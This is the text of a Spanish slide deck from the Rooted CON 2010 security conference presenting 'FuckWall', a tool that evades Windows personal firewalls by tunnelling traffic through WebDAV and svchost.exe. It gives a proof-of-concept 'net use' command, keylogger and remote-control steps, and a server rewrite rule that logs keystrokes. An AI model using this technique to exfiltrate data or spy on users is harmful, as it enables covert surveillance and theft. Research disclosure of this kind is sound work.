7. FuckWall: Los orígenes (I) • Once upon a time ... – Éramos jóvenes, cometíamos errores y programábamos por dinero ... – Pero aprendimos de nuestros errores ... Win32/Bypass: Anulando la detección de ficheros ( 2007 ) – Centrado en el bypassing de antivirus – Rudimentario técnicamente pero “ocurrente” Congreso de Seguridad ~ Rooted CON’2010 7

8. FuckWall: Los orígenes (II) • El presente: – Agosto de 2009: ¿Por qué no hacer lo mismo con los firewalls? – FuckWall: A Windows firewalls bypassing tool – Centrado en la evasión de los firewalls  Enviar tráfico de SALIDA sin control por parte del FW personal. – Apoyado en una debilidad de diseño – Desarrollo de una herramienta automatizada Congreso de Seguridad ~ Rooted CON’2010 8

9. FuckWall: Fundamento funcional • Usabilidad vs. Seguridad • Procesos “privilegiados” en firewalls – Por razones de “usabilidad”/”funcionalidad” numerosas compañías firewalls deciden “arbitrariamente” permitir libremente la comunicación de tráfico de salida a determinados procesos. Congreso de Seguridad ~ Rooted CON’2010 9

10. FuckWall: Fundamento funcional • OutPost: Congreso de Seguridad ~ Rooted CON’2010 1 0

11. FuckWall: Fundamento funcional • Zone Alarm: Congreso de Seguridad ~ Rooted CON’2010 1 1

12. FuckWall: Fundamento funcional Y así hasta 8 firewalls personales más ... Se libró ( si la memoria no nos falla ): Jetico Congreso de Seguridad ~ Rooted CON’2010 1 2

13. FuckWall: La idea • Una vieja idea: – ¿Qué sucedería si desde el espacio de usuario pudiesemos controlar uno de esos procesos “privilegiados” por los firewalls? • Se ha realizado anteriormente: – Hooking a una aplicación “privilegiada” – Más usual: hooking del navegador www.securitybydefault.com/2009/09/troyanos-titiriteros.html Congreso de Seguridad ~ Rooted CON’2010 1 3

14. FuckWall: Revisando la idea • Los problemas del hooking: – Técnica “relativamente” difundida e invasiva. – Los antivirus y los firewalls detectan intentos de hooking sobre aplicaciones, alertando al usuario de contenido vírico y/o peligroso. • La idea revisada: – ¿Y si fuese posible desde el espacio de usuario interactuar directamente con un proceso privilegiado sin usar hooking? Congreso de Seguridad ~ Rooted CON’2010 1 4

15. FuckWall: Construyendo la idea (I) • El proceso SVCHOST.EXE – ¿Qué es el proceso SVCHOST.EXE? A grosso modo es la “idea” de Microsoft para ejecutar cualquier servicio que esté contenido en un DLL Congreso de Seguridad ~ Rooted CON’2010 1 5

16. FuckWall: Construyendo la idea (I) • El proceso SVCHOST.EXE – ¿Para qué se usa SVCHOST.EXE? • DNS • uPNP • Tráfico ICMP • Web Folders • Y un largo etc ... Congreso de Seguridad ~ Rooted CON’2010 1 6

17. FuckWall: Construyendo la idea (II) • La gran pregunta: ¿Es posible manipular svchost.exe desde espacio de usuario y sin necesidad de ningún tipo de privilegio especial generando tráfico de salida dirigido? Congreso de Seguridad ~ Rooted CON’2010 1 7

18. FuckWall: Construyendo la idea (III) - A nosotros se nos ocurre: La tecnología de Microsoft Windows denominada “carpetas web” / “web folders” hace uso de svchost.exe para su comunicación » No requiere privilegios » Permite comunicación WebDAV Congreso de Seguridad ~ Rooted CON’2010 1 8

19. FuckWALL: Proof of Concept • ¿Qué hace falta para evadir el control de tráfico saliente en aproximadamente el 90% de los firewalls personales de windows? – Un servidor Apache con el módulo de WebDAV habilitado para compartir un recurso. – Escribir desde el equipo del que queramos bypassear su firewal: net use Z: http://servidordav/recurso Congreso de Seguridad ~ Rooted CON’2010 1 9

20. FuckWALL: Proof of Concept (II) DEMOSTRACIÓN I PoC Congreso de Seguridad ~ Rooted CON’2010 2 0

21. FuckWALL: La Herramienta (I) • FuckWall es una herramienta cliente-servidor que se apoya en el concepto anteriormente mostrado de hacer uso de la comunicación WebDAV, implementada a través del proceso svchost.exe, para evadir las medidas de seguridad sobre el tráfico saliente impuestas por firewalls personales en entornos Microsoft Windows. Congreso de Seguridad ~ Rooted CON’2010 2 1

22. FuckWALL: La Herramienta (II) • Funcionalidades: • Captura de Teclado: Comunicación unidireccional hacia el servidor de las teclas pulsadas en la máquina cliente (víctima) • Control Remoto: – Captura de pantalla: Comunicación bidireccional para envío al servidor de la pantalla capturada ante cada click del ratón en el equipo cliente (victima) – Ejecución de comandos: Comunicación bidireccional para la ejecución de comandos en la máquina cliente (víctima) y envío de resultados al servidor. Congreso de Seguridad ~ Rooted CON’2010 2 2

23. FuckWALL: Función Keylogger • Cada pulsación de tecla genera en el cliente un intento por montar un recurso compartido equivalente a la tecla pulsada. • El servidor rechaza _siempre_ este intento de montaje, registrando la pulsación y la aplicación en la que se ha ejecutado. Congreso de Seguridad ~ Rooted CON’2010 2 3

24. FuckWALL: Función Keylogger • Cliente: – Paso 1: SetWindowHookEx  Tecla pulsada. – Paso 2: WNetAddConnection2  tecla.app.kpk • Servidor (mod_rewrite): – Paso 3: Rewriterule ^(.*).(.*).kpk$ logger.php?app= $1&key=$2  Registro – Paso 4: header('HTTP/1.1 404 Not Found');  Error Congreso de Seguridad ~ Rooted CON’2010 2 4

25. FuckWALL: Proof of Concept (II) DEMOSTRACIÓN II FuckWall Captura de Teclado Congreso de Seguridad ~ Rooted CON’2010 2 5

26. FuckWALL: Función Control Remoto • El cliente se conecta satisfactoriamente al recurso compartido por el servidor. • El servidor para esta funcionalidad hace uso del módulo mod_dav. • El cliente hará envíos de las capturas de pantalla ante cada click del usuario. • El cliente se descarga del servidor la lista de comandos a ejecutar, los ejecuta y devuelve el resultado. Congreso de Seguridad ~ Rooted CON’2010 2 6

27. FuckWALL: Función Control Remoto • Paso 1: WNetAddConnection2  Recurso Netbios SIN Unidad* • Paso 2: SetWindowHookEx  Captura de Pantalla • Paso 3: CreateFile  Copiar datos al Servidor Congreso de Seguridad ~ Rooted CON’2010 2 7

28. FuckWALL: Proof of Concept (II) DEMOSTRACIÓN III FuckWall Control Remoto Congreso de Seguridad ~ Rooted CON’2010 2 8

29. FuckWALL: Conclusiones • Fácil evasión del firewall • Minimos requerimientos técnicos • Llamadas básicas al API • Debilidad basada en la confianza en determinados procesos vitales del sistema. Congreso de Seguridad ~ Rooted CON’2010 2 9

30. ¡GRACIAS POR AGUANTAR EN LA SILLA! Autores ( en escricto orden de nacimiento ): Antonio López – alopmun@gmail.com Javier Medina – medina.fjavier@gmail.com Congreso de Seguridad ~ Rooted CON’2010